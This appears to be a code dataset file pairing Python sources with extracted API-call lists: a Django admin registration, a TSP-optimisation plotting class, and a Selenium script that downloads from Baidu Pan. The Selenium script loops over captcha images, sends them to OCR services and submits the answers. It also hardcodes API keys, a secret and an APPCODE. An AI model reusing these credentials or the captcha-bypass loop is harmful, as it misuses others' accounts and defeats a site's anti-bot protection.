"db_utils.handle_conn.HandleConn",
"discord.ext.commands.MemberConverter",
"tle.cogs.util.codeforces_api.user.info",
"discord.ext.commands.has_role"
] |
[((662, 713), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""update roles (admin-only)"""'}), "(brief='update roles (admin-only)')\n", (678, 713), False, 'from discord.ext import commands\n'), ((719, 745), 'discord.ext.commands.has_role', 'commands.has_role', (['"""Admin"""'], {}), "('Admin')\n", (736, 745), False, 'from discord.ext import commands\n'), ((481, 505), 'discord.ext.commands.RoleConverter', 'commands.RoleConverter', ([], {}), '()\n', (503, 505), False, 'from discord.ext import commands\n'), ((1003, 1027), 'db_utils.handle_conn.HandleConn', 'HandleConn', (['"""handles.db"""'], {}), "('handles.db')\n", (1013, 1027), False, 'from db_utils.handle_conn import HandleConn\n'), ((1647, 1673), 'discord.ext.commands.MemberConverter', 'commands.MemberConverter', ([], {}), '()\n', (1671, 1673), False, 'from discord.ext import commands\n'), ((1096, 1137), 'tle.cogs.util.codeforces_api.user.info', 'cf.user.info', ([], {'handles': '[t[1] for t in res]'}), '(handles=[t[1] for t in res])\n', (1108, 1137), True, 'from tle.cogs.util import codeforces_api as cf\n')]
|
from django.contrib import admin
from apps.employees.models import Employee, Position, Schedule
admin.site.register(Employee)
admin.site.register(Position)
admin.site.register(Schedule)
|
[
"django.contrib.admin.site.register"
] |
[((97, 126), 'django.contrib.admin.site.register', 'admin.site.register', (['Employee'], {}), '(Employee)\n', (116, 126), False, 'from django.contrib import admin\n'), ((127, 156), 'django.contrib.admin.site.register', 'admin.site.register', (['Position'], {}), '(Position)\n', (146, 156), False, 'from django.contrib import admin\n'), ((157, 186), 'django.contrib.admin.site.register', 'admin.site.register', (['Schedule'], {}), '(Schedule)\n', (176, 186), False, 'from django.contrib import admin\n')]
|
"""
Base Class for Optimization Algorithms
Implements problem instance loading, heuristic initialization function, and data plotting functions.
"""
# ----------------------------------------------------------
import tsplib95 as tsp
from numpy.random import default_rng
# plotting
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.lines as mlines
from matplotlib import cm
matplotlib.use("pgf")
matplotlib.rcParams.update(
{
"pgf.texsystem": "pdflatex",
"font.family": "serif",
"text.usetex": True,
"pgf.rcfonts": False,
}
)
from pathlib import Path
from candidate_solution import CandidateSolution, weight
# from agent import distance
# ------------------------------------------------------------------------------
class OptimisationBase:
"""
Abstract base class for Optimisation Algorithms
"""
# Initialization and built-in function overriding
def __init__(self, parameters, output_path):
self.output_path = output_path
self.size = parameters["size"]
self.max_iterations = parameters["max_iterations"]
self.heuristic_init = parameters["heuristic_init"]
self.load_problem(parameters["problem_filename"])
self.iteration = 0
self.memory = []
self.quality_by_iteration = []
self.quality_overall = []
self.run_stats = {**parameters}
def __repr__(self):
return "<Optimization size:%s limit:%s problem:%s>" % (
self.size,
self.max_iterations,
self.problem.name,
)
def __str__(self):
return "Optimization: population size %s, limit %s, problem %s" % (
self.size,
self.max_iterations,
self.problem.name,
)
def get_heuristic_tour(self):
def d(a, b):
return self.problem.get_weight(a, b)
rng = default_rng()
nodes = list(self.problem.get_nodes())
first = rng.choice(nodes)
nodes.remove(first)
tour = []
tour.append(first)
while nodes:
next_node = min([(node, d(tour[-1], node)) for node in nodes])
tour.append(next_node[0])
nodes.remove(next_node[0])
return tour
def load_problem(self, problem_filename):
"""
Load problem from file, as well as opt.tour if available
"""
self.problem = tsp.load(problem_filename)
CandidateSolution.set_problem(self.problem)
self.optimum = None
opt_tour = problem_filename[:-4] + ".opt.tour"
try:
self.optimum = CandidateSolution(tsp.load(opt_tour).tours[0])
except FileNotFoundError as err:
print("FileNotFoundError: {0}".format(err))
else:
pass
# Output Methods -----------------------------------------------------------
def print_best(self):
# make figure, axes
plt.style.use("ggplot")
plt.tight_layout()
gs_kw = dict(width_ratios=[3, 2], height_ratios=[1])
fig, (ax1, ax2) = plt.subplots(
figsize=(9, 4.5), ncols=2, nrows=1, gridspec_kw=gs_kw
)
ax1.set(title="Optimisation Result", xlabel="x", ylabel="y")
# ax1.set_aspect('equal', 'box')
ax1.set_aspect("equal")
ax2.set(title="Quality development", xlabel="iteration", ylabel="tour length")
# AX1 Best Solution vs. Optimal Solution
# Nodes
xs, ys = zip(*self.problem.node_coords.values())
labels = self.problem.node_coords.keys()
ax1.scatter(xs, ys, marker="o", color="dimgrey", zorder=10)
for label, x, y in zip(labels, xs, ys):
ax1.annotate(label, xy=(x, y), zorder=20)
# xs,ys hold data for city coordinates
xs, ys = zip(*self.problem.node_coords.values())
labels = self.problem.node_coords.keys()
# plots best tour in self.memory
best_tour = min(self.memory, key=lambda p: p.weight).tour
xt = []
yt = []
for p in best_tour:
coords = self.problem.node_coords[p]
xt.append(coords[0])
yt.append(coords[1])
xt.append(xt[0])
yt.append(yt[0])
ax1.plot(xt, yt, alpha=1.0, color="darkred", linestyle="dashed", zorder=2)
# plots optimum tour if given
if self.optimum is not None:
opt_tour = self.optimum.tour
xt = []
yt = []
for p in opt_tour:
coords = self.problem.node_coords[p]
xt.append(coords[0])
yt.append(coords[1])
xt.append(xt[0])
yt.append(yt[0])
ax1.plot(xt, yt, alpha=0.4, color="yellowgreen", linewidth=5, zorder=1)
# Labels
redline = mlines.Line2D(
[], [], color="darkred", linestyle="dashed", label="Overall Best Tour"
)
yellowline = mlines.Line2D(
[], [], color="yellowgreen", linewidth="5", label="Known Optimal Tour"
)
grey_dot = mlines.Line2D(
[], [], color="dimgrey", marker="o", linestyle="", label="Node"
)
ax1.legend(
handles=[redline, yellowline, grey_dot],
loc="upper center",
bbox_to_anchor=(0.5, -0.1),
shadow=True,
ncol=3,
)
# AX2 - Stats
ymax = max(max(self.quality_overall), max(self.quality_by_iteration))
if self.optimum is not None:
ymin = self.optimum.weight
else:
ymin = min(min(self.quality_overall), min(self.quality_by_iteration))
margin = (ymax - ymin) * 0.5
ax2.set(
xlim=(-0.5, self.max_iterations + 0.5), ylim=(ymin - margin, ymax + margin)
)
iterations = list(range(0, self.iteration + 1))
ax2.plot(iterations, self.quality_by_iteration, marker="", color="red")
ax2.plot(iterations, self.quality_overall, marker="", color="grey")
if self.optimum is not None:
ax2.axhline(y=self.optimum.weight, color="yellowgreen", linewidth=2)
# Legend
red_dot = mlines.Line2D([], [], color="red", marker="", label="Iteration best")
grey_dot = mlines.Line2D([], [], color="grey", marker="", label="Overall best")
ax2_handles = [red_dot, grey_dot]
if self.optimum is not None:
baseline = mlines.Line2D(
[], [], color="yellowgreen", linewidth=2, label="Known Optimum"
)
ax2_handles.append(baseline)
ax2.legend(
handles=ax2_handles,
loc="upper center",
bbox_to_anchor=(0.5, -0.1),
shadow=True,
ncol=2,
)
fig.tight_layout()
# Saving to specific directory and file
out_path = "output/{}".format(self.output_path)
Path(out_path).mkdir(parents=True, exist_ok=True)
plt.savefig("{}/best.png".format(out_path), format="png")
plt.savefig("{}/best.pgf".format(out_path), format="pgf")
plt.close(fig)
def print_map_only(self):
# make figure, axes
plt.style.use("ggplot")
plt.tight_layout()
gs_kw = dict(width_ratios=[1], height_ratios=[1])
fig, (ax1) = plt.subplots(
figsize=(4.4, 5.9), ncols=1, nrows=1, gridspec_kw=gs_kw
)
titel = f"eil51 - Iteration {self.iteration}"
ax1.set(title=titel, xlabel="x", ylabel="y")
ax1.set_aspect("equal")
# AX1 Best Solution vs. Optimal Solution
# Nodes
xs, ys = zip(*self.problem.node_coords.values())
# labels = self.problem.node_coords.keys()
ax1.scatter(xs, ys, marker="o", color="dimgrey", zorder=10)
# for label, x, y in zip(labels, xs, ys):
# ax1.annotate(label, xy=(x, y), zorder=20)
# xs,ys hold data for city coordinates
xs, ys = zip(*self.problem.node_coords.values())
labels = self.problem.node_coords.keys()
# plots best tour in self.memory
best_tour = min(self.memory, key=lambda p: p.weight).tour
xt = []
yt = []
for p in best_tour:
coords = self.problem.node_coords[p]
xt.append(coords[0])
yt.append(coords[1])
xt.append(xt[0])
yt.append(yt[0])
ax1.plot(xt, yt, alpha=1.0, color="C1", linestyle="dashed", zorder=2)
# plots optimum tour if given
if self.optimum is not None:
opt_tour = self.optimum.tour
xt = []
yt = []
for p in opt_tour:
coords = self.problem.node_coords[p]
xt.append(coords[0])
yt.append(coords[1])
xt.append(xt[0])
yt.append(yt[0])
ax1.plot(xt, yt, alpha=0.4, color="C4", linewidth=5, zorder=1)
# Labels
redline = mlines.Line2D(
[], [], color="C1", linestyle="dashed", label="Overall Best Tour"
)
yellowline = mlines.Line2D(
[], [], color="C4", linewidth="5", label="Known Optimal Tour"
)
grey_dot = mlines.Line2D(
[], [], color="dimgrey", marker="o", linestyle="", label="City"
)
ax1.legend(
handles=[redline, yellowline, grey_dot],
loc="upper center",
bbox_to_anchor=(0.5, -0.1),
shadow=True,
ncol=1,
)
fig.tight_layout(rect=[0, 0, 1, 1])
# Saving to specific directory and file
out_path = "output/{}".format(self.output_path)
Path(out_path).mkdir(parents=True, exist_ok=True)
plt.savefig("{}/best_{}.png".format(out_path, self.iteration), format="png")
plt.savefig("{}/best_{}.pgf".format(out_path, self.iteration), format="pgf")
plt.close(fig)
def print_stats_only(self):
# make figure, axes
plt.style.use("ggplot")
plt.tight_layout()
gs_kw = dict(width_ratios=[1], height_ratios=[1])
fig, (ax2) = plt.subplots(figsize=(9, 4.5), ncols=1, nrows=1, gridspec_kw=gs_kw)
ax2.set(title="Quality development", xlabel="iteration", ylabel="tour length")
ymax = max(max(self.quality_overall), max(self.quality_by_iteration))
if self.optimum is not None:
ymin = self.optimum.weight
else:
ymin = min(min(self.quality_overall), min(self.quality_by_iteration))
margin = (ymax - ymin) * 0.5
ax2.set(
xlim=(-0.5, self.max_iterations + 0.5), ylim=(ymin - margin, ymax + margin)
)
iterations = list(range(0, self.iteration + 1))
ax2.plot(iterations, self.quality_by_iteration, marker="", color="red")
ax2.plot(iterations, self.quality_overall, marker="", color="grey")
if self.optimum is not None:
ax2.axhline(y=self.optimum.weight, color="yellowgreen", linewidth=2)
# Legend
red_dot = mlines.Line2D([], [], color="red", marker="", label="Iteration best")
grey_dot = mlines.Line2D([], [], color="grey", marker="", label="Overall best")
ax2_handles = [red_dot, grey_dot]
if self.optimum is not None:
baseline = mlines.Line2D(
[], [], color="yellowgreen", linewidth=2, label="Known Optimum"
)
ax2_handles.append(baseline)
ax2.legend(handles=ax2_handles, loc="upper right", shadow=True)
# Saving to specific directory and file
out_path = "output/{}".format(self.output_path)
Path(out_path).mkdir(parents=True, exist_ok=True)
plt.savefig("{}/stats.png".format(out_path), format="png")
plt.savefig("{}/stats.pgf".format(out_path), format="pgf")
plt.close(fig)
def print_state(self, population):
"""
Print State of Optimization with Coordinate System of tours and stats,
default: only latest addition to the memory is plottet
a population given by list of tours is additionally plottet if provided
"""
# make figure, axes
# plt.style.use('seaborn-whitegrid')
plt.style.use("ggplot")
gs_kw = dict(width_ratios=[3, 2], height_ratios=[1])
fig, (ax1, ax2) = plt.subplots(
figsize=(9, 4.5), ncols=2, nrows=1, gridspec_kw=gs_kw
)
plt.tight_layout()
ax1.set(title="Optimisation State", xlabel="x", ylabel="y")
ax1.set_aspect("equal")
ax2.set(title="Quality development", xlabel="iteration", ylabel="tour length")
# AX1 - Coordinate System
# Nodes
xs, ys = zip(*self.problem.node_coords.values())
labels = self.problem.node_coords.keys()
ax1.scatter(xs, ys, marker="o", color="dimgrey", zorder=10)
for label, x, y in zip(labels, xs, ys):
ax1.annotate(label, xy=(x, y), zorder=20)
# Tours (in current population)
for _ in range(0, len(population)):
for agent in population:
xt = []
yt = []
for p in agent.tour:
coords = self.problem.node_coords[p]
xt.append(coords[0])
yt.append(coords[1])
xt.append(xt[0])
yt.append(yt[0])
ax1.plot(xt, yt, alpha=0.1, color="goldenrod", linewidth=5)
# Best Tour in Population
best_agent = self.memory[self.iteration]
best_tour = best_agent.tour
xt = []
yt = []
for p in best_tour:
coords = self.problem.node_coords[p]
xt.append(coords[0])
yt.append(coords[1])
xt.append(xt[0])
yt.append(yt[0])
ax1.plot(xt, yt, alpha=1.0, color="darkred", linestyle="dashed")
# LABELS
redline = mlines.Line2D(
[], [], color="darkred", linestyle="dashed", label="Best Tour in Iteration"
)
yellowline = mlines.Line2D(
[], [], color="goldenrod", linewidth="5", label="Other Tours in Iteration"
)
grey_dot = mlines.Line2D(
[], [], color="dimgrey", marker="o", linestyle="", label="Node"
)
ax1.legend(
handles=[grey_dot, yellowline, redline],
loc="upper center",
bbox_to_anchor=(0.5, -0.1),
shadow=True,
ncol=3,
)
# AX2 - Stats
ax2.set(xlim=(0 - 0.5, self.max_iterations + 0.5))
iterations = list(range(0, self.iteration + 1))
ax2.plot(
iterations, self.quality_by_iteration, marker="o", color="red", linestyle=""
)
ax2.plot(
iterations, self.quality_overall, marker="x", color="grey", linestyle=""
)
# LABELS
red_dot = mlines.Line2D(
[], [], color="red", marker="o", label="Iteration best", linestyle=""
)
grey_dot = mlines.Line2D(
[], [], color="grey", marker="x", label="Overall best", linestyle=""
)
ax2.legend(
handles=[red_dot, grey_dot],
loc="upper center",
bbox_to_anchor=(0.5, -0.1),
shadow=True,
ncol=2,
)
fig.tight_layout()
# Saving to specific directory and file
out_path = "output/{}".format(self.output_path)
Path(out_path).mkdir(parents=True, exist_ok=True)
plt.savefig(
"{}/iteration_{:03d}.png".format(out_path, self.iteration), format="png"
)
plt.savefig(
"{}/iteration_{:03d}.pgf".format(out_path, self.iteration), format="pgf"
)
plt.close(fig)
|
[
"matplotlib.lines.Line2D",
"matplotlib.pyplot.close",
"matplotlib.rcParams.update",
"tsplib95.load",
"matplotlib.pyplot.subplots",
"numpy.random.default_rng",
"candidate_solution.CandidateSolution.set_problem",
"matplotlib.pyplot.style.use",
"matplotlib.use",
"pathlib.Path",
"matplotlib.pyplot.tight_layout"
] |
[((396, 417), 'matplotlib.use', 'matplotlib.use', (['"""pgf"""'], {}), "('pgf')\n", (410, 417), False, 'import matplotlib\n'), ((418, 546), 'matplotlib.rcParams.update', 'matplotlib.rcParams.update', (["{'pgf.texsystem': 'pdflatex', 'font.family': 'serif', 'text.usetex': True,\n 'pgf.rcfonts': False}"], {}), "({'pgf.texsystem': 'pdflatex', 'font.family':\n 'serif', 'text.usetex': True, 'pgf.rcfonts': False})\n", (444, 546), False, 'import matplotlib\n'), ((1908, 1921), 'numpy.random.default_rng', 'default_rng', ([], {}), '()\n', (1919, 1921), False, 'from numpy.random import default_rng\n'), ((2428, 2454), 'tsplib95.load', 'tsp.load', (['problem_filename'], {}), '(problem_filename)\n', (2436, 2454), True, 'import tsplib95 as tsp\n'), ((2463, 2506), 'candidate_solution.CandidateSolution.set_problem', 'CandidateSolution.set_problem', (['self.problem'], {}), '(self.problem)\n', (2492, 2506), False, 'from candidate_solution import CandidateSolution, weight\n'), ((2951, 2974), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""ggplot"""'], {}), "('ggplot')\n", (2964, 2974), True, 'import matplotlib.pyplot as plt\n'), ((2983, 3001), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (2999, 3001), True, 'import matplotlib.pyplot as plt\n'), ((3090, 3157), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(9, 4.5)', 'ncols': '(2)', 'nrows': '(1)', 'gridspec_kw': 'gs_kw'}), '(figsize=(9, 4.5), ncols=2, nrows=1, gridspec_kw=gs_kw)\n', (3102, 3157), True, 'import matplotlib.pyplot as plt\n'), ((4815, 4905), 'matplotlib.lines.Line2D', 'mlines.Line2D', (['[]', '[]'], {'color': '"""darkred"""', 'linestyle': '"""dashed"""', 'label': '"""Overall Best Tour"""'}), "([], [], color='darkred', linestyle='dashed', label=\n 'Overall Best Tour')\n", (4828, 4905), True, 'import matplotlib.lines as mlines\n'), ((4944, 5034), 'matplotlib.lines.Line2D', 'mlines.Line2D', (['[]', '[]'], {'color': '"""yellowgreen"""', 'linewidth': '"""5"""', 'label': '"""Known Optimal Tour"""'}), "([], [], color='yellowgreen', linewidth='5', label=\n 'Known Optimal Tour')\n", (4957, 5034), True, 'import matplotlib.lines as mlines\n'), ((5071, 5149), 'matplotlib.lines.Line2D', 'mlines.Line2D', (['[]', '[]'], {'color': '"""dimgrey"""', 'marker': '"""o"""', 'linestyle': '""""""', 'label': '"""Node"""'}), "([], [], color='dimgrey', marker='o', linestyle='', label='Node')\n", (5084, 5149), True, 'import matplotlib.lines as mlines\n'), ((6167, 6236), 'matplotlib.lines.Line2D', 'mlines.Line2D', (['[]', '[]'], {'color': '"""red"""', 'marker': '""""""', 'label': '"""Iteration best"""'}), "([], [], color='red', marker='', label='Iteration best')\n", (6180, 6236), True, 'import matplotlib.lines as mlines\n'), ((6256, 6324), 'matplotlib.lines.Line2D', 'mlines.Line2D', (['[]', '[]'], {'color': '"""grey"""', 'marker': '""""""', 'label': '"""Overall best"""'}), "([], [], color='grey', marker='', label='Overall best')\n", (6269, 6324), True, 'import matplotlib.lines as mlines\n'), ((7092, 7106), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (7101, 7106), True, 'import matplotlib.pyplot as plt\n'), ((7175, 7198), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""ggplot"""'], {}), "('ggplot')\n", (7188, 7198), True, 'import matplotlib.pyplot as plt\n'), ((7207, 7225), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (7223, 7225), True, 'import matplotlib.pyplot as plt\n'), ((7306, 7375), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(4.4, 5.9)', 'ncols': '(1)', 'nrows': '(1)', 'gridspec_kw': 'gs_kw'}), '(figsize=(4.4, 5.9), ncols=1, nrows=1, gridspec_kw=gs_kw)\n', (7318, 7375), True, 'import matplotlib.pyplot as plt\n'), ((8935, 9020), 'matplotlib.lines.Line2D', 'mlines.Line2D', (['[]', '[]'], {'color': '"""C1"""', 'linestyle': '"""dashed"""', 'label': '"""Overall Best Tour"""'}), "([], [], color='C1', linestyle='dashed', label='Overall Best Tour'\n )\n", (8948, 9020), True, 'import matplotlib.lines as mlines\n'), ((9059, 9135), 'matplotlib.lines.Line2D', 'mlines.Line2D', (['[]', '[]'], {'color': '"""C4"""', 'linewidth': '"""5"""', 'label': '"""Known Optimal Tour"""'}), "([], [], color='C4', linewidth='5', label='Known Optimal Tour')\n", (9072, 9135), True, 'import matplotlib.lines as mlines\n'), ((9177, 9255), 'matplotlib.lines.Line2D', 'mlines.Line2D', (['[]', '[]'], {'color': '"""dimgrey"""', 'marker': '"""o"""', 'linestyle': '""""""', 'label': '"""City"""'}), "([], [], color='dimgrey', marker='o', linestyle='', label='City')\n", (9190, 9255), True, 'import matplotlib.lines as mlines\n'), ((9864, 9878), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (9873, 9878), True, 'import matplotlib.pyplot as plt\n'), ((9949, 9972), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""ggplot"""'], {}), "('ggplot')\n", (9962, 9972), True, 'import matplotlib.pyplot as plt\n'), ((9981, 9999), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (9997, 9999), True, 'import matplotlib.pyplot as plt\n'), ((10080, 10147), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(9, 4.5)', 'ncols': '(1)', 'nrows': '(1)', 'gridspec_kw': 'gs_kw'}), '(figsize=(9, 4.5), ncols=1, nrows=1, gridspec_kw=gs_kw)\n', (10092, 10147), True, 'import matplotlib.pyplot as plt\n'), ((11009, 11078), 'matplotlib.lines.Line2D', 'mlines.Line2D', (['[]', '[]'], {'color': '"""red"""', 'marker': '""""""', 'label': '"""Iteration best"""'}), "([], [], color='red', marker='', label='Iteration best')\n", (11022, 11078), True, 'import matplotlib.lines as mlines\n'), ((11098, 11166), 'matplotlib.lines.Line2D', 'mlines.Line2D', (['[]', '[]'], {'color': '"""grey"""', 'marker': '""""""', 'label': '"""Overall best"""'}), "([], [], color='grey', marker='', label='Overall best')\n", (11111, 11166), True, 'import matplotlib.lines as mlines\n'), ((11798, 11812), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (11807, 11812), True, 'import matplotlib.pyplot as plt\n'), ((12181, 12204), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""ggplot"""'], {}), "('ggplot')\n", (12194, 12204), True, 'import matplotlib.pyplot as plt\n'), ((12293, 12360), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(9, 4.5)', 'ncols': '(2)', 'nrows': '(1)', 'gridspec_kw': 'gs_kw'}), '(figsize=(9, 4.5), ncols=2, nrows=1, gridspec_kw=gs_kw)\n', (12305, 12360), True, 'import matplotlib.pyplot as plt\n'), ((12391, 12409), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (12407, 12409), True, 'import matplotlib.pyplot as plt\n'), ((13868, 13963), 'matplotlib.lines.Line2D', 'mlines.Line2D', (['[]', '[]'], {'color': '"""darkred"""', 'linestyle': '"""dashed"""', 'label': '"""Best Tour in Iteration"""'}), "([], [], color='darkred', linestyle='dashed', label=\n 'Best Tour in Iteration')\n", (13881, 13963), True, 'import matplotlib.lines as mlines\n'), ((14002, 14096), 'matplotlib.lines.Line2D', 'mlines.Line2D', (['[]', '[]'], {'color': '"""goldenrod"""', 'linewidth': '"""5"""', 'label': '"""Other Tours in Iteration"""'}), "([], [], color='goldenrod', linewidth='5', label=\n 'Other Tours in Iteration')\n", (14015, 14096), True, 'import matplotlib.lines as mlines\n'), ((14133, 14211), 'matplotlib.lines.Line2D', 'mlines.Line2D', (['[]', '[]'], {'color': '"""dimgrey"""', 'marker': '"""o"""', 'linestyle': '""""""', 'label': '"""Node"""'}), "([], [], color='dimgrey', marker='o', linestyle='', label='Node')\n", (14146, 14211), True, 'import matplotlib.lines as mlines\n'), ((14840, 14928), 'matplotlib.lines.Line2D', 'mlines.Line2D', (['[]', '[]'], {'color': '"""red"""', 'marker': '"""o"""', 'label': '"""Iteration best"""', 'linestyle': '""""""'}), "([], [], color='red', marker='o', label='Iteration best',\n linestyle='')\n", (14853, 14928), True, 'import matplotlib.lines as mlines\n'), ((14966, 15053), 'matplotlib.lines.Line2D', 'mlines.Line2D', (['[]', '[]'], {'color': '"""grey"""', 'marker': '"""x"""', 'label': '"""Overall best"""', 'linestyle': '""""""'}), "([], [], color='grey', marker='x', label='Overall best',\n linestyle='')\n", (14979, 15053), True, 'import matplotlib.lines as mlines\n'), ((15693, 15707), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (15702, 15707), True, 'import matplotlib.pyplot as plt\n'), ((6428, 6506), 'matplotlib.lines.Line2D', 'mlines.Line2D', (['[]', '[]'], {'color': '"""yellowgreen"""', 'linewidth': '(2)', 'label': '"""Known Optimum"""'}), "([], [], color='yellowgreen', linewidth=2, label='Known Optimum')\n", (6441, 6506), True, 'import matplotlib.lines as mlines\n'), ((11270, 11348), 'matplotlib.lines.Line2D', 'mlines.Line2D', (['[]', '[]'], {'color': '"""yellowgreen"""', 'linewidth': '(2)', 'label': '"""Known Optimum"""'}), "([], [], color='yellowgreen', linewidth=2, label='Known Optimum')\n", (11283, 11348), True, 'import matplotlib.lines as mlines\n'), ((6901, 6915), 'pathlib.Path', 'Path', (['out_path'], {}), '(out_path)\n', (6905, 6915), False, 'from pathlib import Path\n'), ((9636, 9650), 'pathlib.Path', 'Path', (['out_path'], {}), '(out_path)\n', (9640, 9650), False, 'from pathlib import Path\n'), ((11606, 11620), 'pathlib.Path', 'Path', (['out_path'], {}), '(out_path)\n', (11610, 11620), False, 'from pathlib import Path\n'), ((15402, 15416), 'pathlib.Path', 'Path', (['out_path'], {}), '(out_path)\n', (15406, 15416), False, 'from pathlib import Path\n'), ((2648, 2666), 'tsplib95.load', 'tsp.load', (['opt_tour'], {}), '(opt_tour)\n', (2656, 2666), True, 'import tsplib95 as tsp\n')]
|
# coding=utf-8
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from aip import AipOcr
import requests
import base64
import urllib.request
import urllib
import os
import pytesseract
from PIL import Image
client = AipOcr('18671664', 'O0d2Tgv4imtAfVqhQF49py0o', 'au1xuxZlqqROnOjlVqLCfHhO4lLQZICl')
import json
import time
import pickle
import urllib.parse
import re
# import nal
# print(html)
# exit('zss')
# 开启performance日志记录
# chrome_options = Options()
def save_cookies(requests_cookiejar, filename):
with open(filename, 'wb') as f:
pickle.dump(requests_cookiejar, f, 0)
url = 'https://pan.baidu.com/s/1n890K1uMotIasOIwEQ5neQ'
tqm = '4cau'
tqmCssId = 'ktlJmA'
clickName = 'ivirlGXq'
cookies_file = 'baidu.cookies'
urlArr = url.rsplit('/', 1)
downloadUrl = '/Users/zhongsheng/PycharmProjects/baidu2/' + urlArr[1]
print(downloadUrl)
# exit()
chromeOptions = webdriver.ChromeOptions()
prefs = {"download.default_directory": downloadUrl}
chromeOptions.add_experimental_option("prefs", prefs)
driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=chromeOptions)
# driver = webdriver.Chrome(executable_path="C:\python\chromedriver.exe", chrome_options=chrome_options,
# desired_capabilities=caps)
# driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=chrome_options, desired_capabilities=caps)
# driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())
# driver = webdriver.Firefox(executable_path='/Users/zhongsheng/test/geckodriver')
# driver = webdriver.Firefox()
driver.get(url)
cookies = pickle.load(open(cookies_file, "rb"))
for cookie in cookies:
# print(cookie)
if 'expiry' in cookie:
del cookie['expiry']
driver.add_cookie(cookie)
# driver.refresh()
# time.sleep(4)
driver.get(url)
# info = driver.find_element_by_xpath("//a[@node-type='header-login-btn']").text
# print(info);
# if info == '登录':
# elem = driver.find_element_by_id(tqmCssId)
# elem.send_keys(tqm)
# element = driver.find_element_by_id(clickName)
# driver.execute_script("arguments[0].click();", element)
# 下载页面
time.sleep(5)
driver.find_element_by_xpath("//a[@data-button-id='b3']").click()
# # print(jsonCookies)
# with open(cookies_file, 'w') as f:
# f.write(jsonCookies)
# save_cookies(cookies, cookies_file)
# 链接: https://pan.baidu.com/s/1lgSXM9s1XwLVtI3PTTKJSg 提取码: j5pj
# js事件执行发送请求后浏览器弹窗下载,拿到日志记录
time.sleep(5)
for a in range(100):
time.sleep(2)
img = driver.find_element_by_xpath("//img[@class='img-code']").get_attribute('src')
urllib.request.urlretrieve(img, '23.jpeg')
# exit('aa')
time.sleep(2)
# encodestr = nal.getImg('23.jpeg')
# dict = {'img': encodestr}
# yzm = nal.getYzm(dict)
# print(yzm)
# API产品路径
host = 'https://codevirify.market.alicloudapi.com'
path = '/icredit_ai_image/verify_code/v1'
# 阿里云APPCODE
appcode = '712d406485a44077a7e72d7b03a2af36'
bodys = {}
url = host + path
# 内容数据类型,如:0,则表示BASE64编码;1,则表示图像文件URL链接
# 启用BASE64编码方式进行识别
# 内容数据类型是BASE64编码
# f = open(r'23.jpeg', 'rb')
# contents = base64.b64encode(f.read())
# f.close()
with open('23.jpeg', 'rb') as f: # 以二进制读取本地图片
data = f.read()
contents = str(base64.b64encode(data), 'utf-8')
bodys['IMAGE'] = contents
bodys['IMAGE_TYPE'] = '0'
# 启用URL方式进行识别
# 内容数据类型是图像文件URL链接
# bodys['IMAGE'] = '图片URL链接'
# bodys['IMAGE_TYPE'] = '1'
post_data = urllib.parse.urlencode(bodys).encode('utf-8')
request = urllib.request.Request(url, post_data)
request.add_header('Authorization', 'APPCODE ' + appcode)
request.add_header('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8')
response = urllib.request.urlopen(request)
content = response.read()
yzm = ''
if (content):
print(content.decode('utf-8'))
ss = content.decode("utf8")
print(ss)
ss1 = json.loads(ss)
aa = ss1['VERIFY_CODE_ENTITY']['VERIFY_CODE']
# aa = ss1['prism_wordsInfo'][0]['word']
yzm = re.sub('\s', '', aa)
# print(strs['words_result']['words'])
# driver.find_element_by_xpath("//span[@class='text']").click()
time.sleep(1)
elemYzm = driver.find_element_by_xpath("//input[@class='input-code']")
elemYzm.clear()
elemYzm.send_keys(yzm)
time.sleep(1)
print('#############点击')
# driver.find_element_by_xpath("//a[@class='underline']").click()
driver.find_element_by_link_text('确定').click()
print('#############')
time.sleep(2)
driver.find_element_by_link_text('换一张').click()
def every_downloads_chrome(driver):
if not driver.current_url.startswith("chrome://downloads"):
driver.execute_script('window.open()')
# 定位到新的页面
driver.switch_to_window(driver.window_handles[1])
driver.get("chrome://downloads/")
return driver.execute_script("""
var items = downloads.Manager.get().items_;
if (items.every(e => e.state === "COMPLETE"))
return items.map(e => e.file_url);
""")
# waits for all the files to be completed and returns the paths
paths = WebDriverWait(driver, 120, 1).until(every_downloads_chrome)
print(paths)
time.sleep(10)
driver.quit()
exit()
def get_file_content(filePath):
with open(filePath, 'rb') as fp:
return fp.read()
options = {}
options["language_type"] = "CHN_ENG"
options["detect_direction"] = "true"
options["detect_language"] = "true"
options["probability"] = "true"
yzm = ''
for a in range(100):
img = driver.find_element_by_xpath("//img[@class='img-code']").get_attribute('src')
urllib.request.urlretrieve(img, '3.jpeg')
# strs = client.basicGeneralUrl(img, options)
image = get_file_content('3.jpeg')
strs = client.basicGeneral(image, options)
print(img)
print(strs)
if strs['words_result']:
yzm = strs['words_result'][0]['words']
print(strs['words_result'][0])
# print(strs['words_result']['words'])
# driver.find_element_by_xpath("//span[@class='text']").click()
time.sleep(1)
elemYzm = driver.find_element_by_xpath("//input[@class='input-code']")
elemYzm.send_keys('')
